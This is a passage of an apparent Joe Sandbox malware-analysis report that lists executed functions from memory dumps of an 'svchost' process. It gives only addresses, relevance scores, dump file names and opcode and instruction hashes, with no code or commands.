                                                                                                                                          • Opcode Fuzzy Hash: 2eb643694192db0a67e1cd9a3c117e92eb5904ea578ccf4e3ff220aa4a9eed78
                                                                                                                                          • Instruction Fuzzy Hash: EF215752B1891A8BFB44B7BC985A7FC72D6FF9C701F108579E00EC3292DD2899424381
                                                                                                                                          Function 00007FFAAC571871 Relevance: .0, Instructions: 45COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000008.00000002.1415314241.00007FFAAC570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC570000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_8_2_7ffaac570000_svchost.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 4044ae6a90e6c1693abf6e457cf09714559a31c865188b7f27062c047abf75bd
                                                                                                                                          • Instruction ID: a3e47201ae9c811484a38dd074985c04d27240f36142699b02dd21f1cd0e35a3
                                                                                                                                          • Opcode Fuzzy Hash: 4044ae6a90e6c1693abf6e457cf09714559a31c865188b7f27062c047abf75bd
                                                                                                                                          • Instruction Fuzzy Hash: 7901F755D4D7A28FF755A72859914727FE0DF96210F0848AEF48CC6193ED04998983C2

                                                                                                                                          Executed Functions

                                                                                                                                          Function 00007FFAAC580ED9 Relevance: .7, Instructions: 689COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1500795607.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_7ffaac580000_svchost.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 4e1a11f65be4c4cb27277ebd463a9db7ec4c7654d1790926bf175b318437db3a
                                                                                                                                          • Instruction ID: 6ea73cf732a3cdea42ac4cb6f4b9cb35e12f400dafca9fc3237fc2d823ea8b44
                                                                                                                                          • Opcode Fuzzy Hash: 4e1a11f65be4c4cb27277ebd463a9db7ec4c7654d1790926bf175b318437db3a
                                                                                                                                          • Instruction Fuzzy Hash: 28220571B5DA4A8FE798FB38C45967977D2FF89301F448579E04EC32D2DE28A8058781
                                                                                                                                          Function 00007FFAAC5816D5 Relevance: 1.4, Strings: 1, Instructions: 180COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1500795607.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_7ffaac580000_svchost.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: O_H
                                                                                                                                          • API String ID: 0-3989587205
                                                                                                                                          • Opcode ID: 2aa3bf841322c0890f91a6db9f5b1c31f89e8697d011729cfdfae357f9383e51
                                                                                                                                          • Instruction ID: f9b84b5fbd09ed845ef132c0543656e91f53167b0449cd20b32fa42f2ae0c0d1
                                                                                                                                          • Opcode Fuzzy Hash: 2aa3bf841322c0890f91a6db9f5b1c31f89e8697d011729cfdfae357f9383e51
                                                                                                                                          • Instruction Fuzzy Hash: 76513451A5E6C54FE786A77888646767FD9EF87215F0804FEE08EC7293DD188806C382
                                                                                                                                          Function 00007FFAAC5804D8 Relevance: 1.4, Strings: 1, Instructions: 135COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1500795607.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_7ffaac580000_svchost.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: O_H
                                                                                                                                          • API String ID: 0-3989587205
                                                                                                                                          • Opcode ID: 5d637d5fed1edfb6c7a2f2218108a49e3e69e07bbe4c9537d1248fdf400db530
                                                                                                                                          • Instruction ID: 5a2a029eb4ddb643d842d0bf925b29a69f10e269646900ce95518446abea539d
                                                                                                                                          • Opcode Fuzzy Hash: 5d637d5fed1edfb6c7a2f2218108a49e3e69e07bbe4c9537d1248fdf400db530
                                                                                                                                          • Instruction Fuzzy Hash: A931D362B189490FEB88FB3CD45A779B6C6EB99315F1445BEF04EC3293DD689C428380
                                                                                                                                          Function 00007FFAAC580C5E Relevance: .3, Instructions: 253COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1500795607.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_7ffaac580000_svchost.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 783e452f825721ed6a476e5948d5b30e152ec7f0f74a04f430401b918a6190b0
                                                                                                                                          • Instruction ID: 814aad445af2f8c3762638b4ece7ed1dbe74d74912b5bca4c5ab82719147c1e7
                                                                                                                                          • Opcode Fuzzy Hash: 783e452f825721ed6a476e5948d5b30e152ec7f0f74a04f430401b918a6190b0
                                                                                                                                          • Instruction Fuzzy Hash: 83715932A1DA8A8FF795A738C8556F97BE1EFC6310F0440BAE04DC7193DD18AC4A8391
                                                                                                                                          Function 00007FFAAC5809A9 Relevance: .1, Instructions: 114COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1500795607.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_7ffaac580000_svchost.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: a3d81466caeccef97733e2760c2ec4d83a1f923cb4c69b98eed1c0ae4d055777
                                                                                                                                          • Instruction ID: c337f9e95d5ea30830d5fb95e7e6ad4e6aca6cde532dad4bf8ded49cb64768d3
                                                                                                                                          • Opcode Fuzzy Hash: a3d81466caeccef97733e2760c2ec4d83a1f923cb4c69b98eed1c0ae4d055777
                                                                                                                                          • Instruction Fuzzy Hash: 10419171A1860E8FEB44FB78C865AF97BE1FF99300F508579D04AD7296CE38A845C780
                                                                                                                                          Function 00007FFAAC580B48 Relevance: .1, Instructions: 83COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1500795607.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_7ffaac580000_svchost.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 8c2dce9bd9ba53c67a2a4a5b2597ba945da6a13a7a3f256d7b79e70a9f8753a2
                                                                                                                                          • Instruction ID: 579d36deaf2e89b5646f050180a3b0f52d94392159c5d312d25082d587dffed6
                                                                                                                                          • Opcode Fuzzy Hash: 8c2dce9bd9ba53c67a2a4a5b2597ba945da6a13a7a3f256d7b79e70a9f8753a2
                                                                                                                                          • Instruction Fuzzy Hash: E9215762B1891A8BF784B7BC985A7FC72D6FF9D711F108179E00ED32D2DD28A8424391
                                                                                                                                          Function 00007FFAAC581871 Relevance: .0, Instructions: 45COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1500795607.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_7ffaac580000_svchost.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 6aff0e0079cee22c0053ead1dab4af252f86a27a237086a46e84842f4faaecdc
                                                                                                                                          • Instruction ID: a7e562daa99a55a39ad4a75fbdba7ae0807af693a4193a1898ed51090fef736d
                                                                                                                                          • Opcode Fuzzy Hash: 6aff0e0079cee22c0053ead1dab4af252f86a27a237086a46e84842f4faaecdc
                                                                                                                                          • Instruction Fuzzy Hash: 69014245C0E7868FF746A72888924737FE0DF92310F0844AAF4CCC6097DD08AA8883C2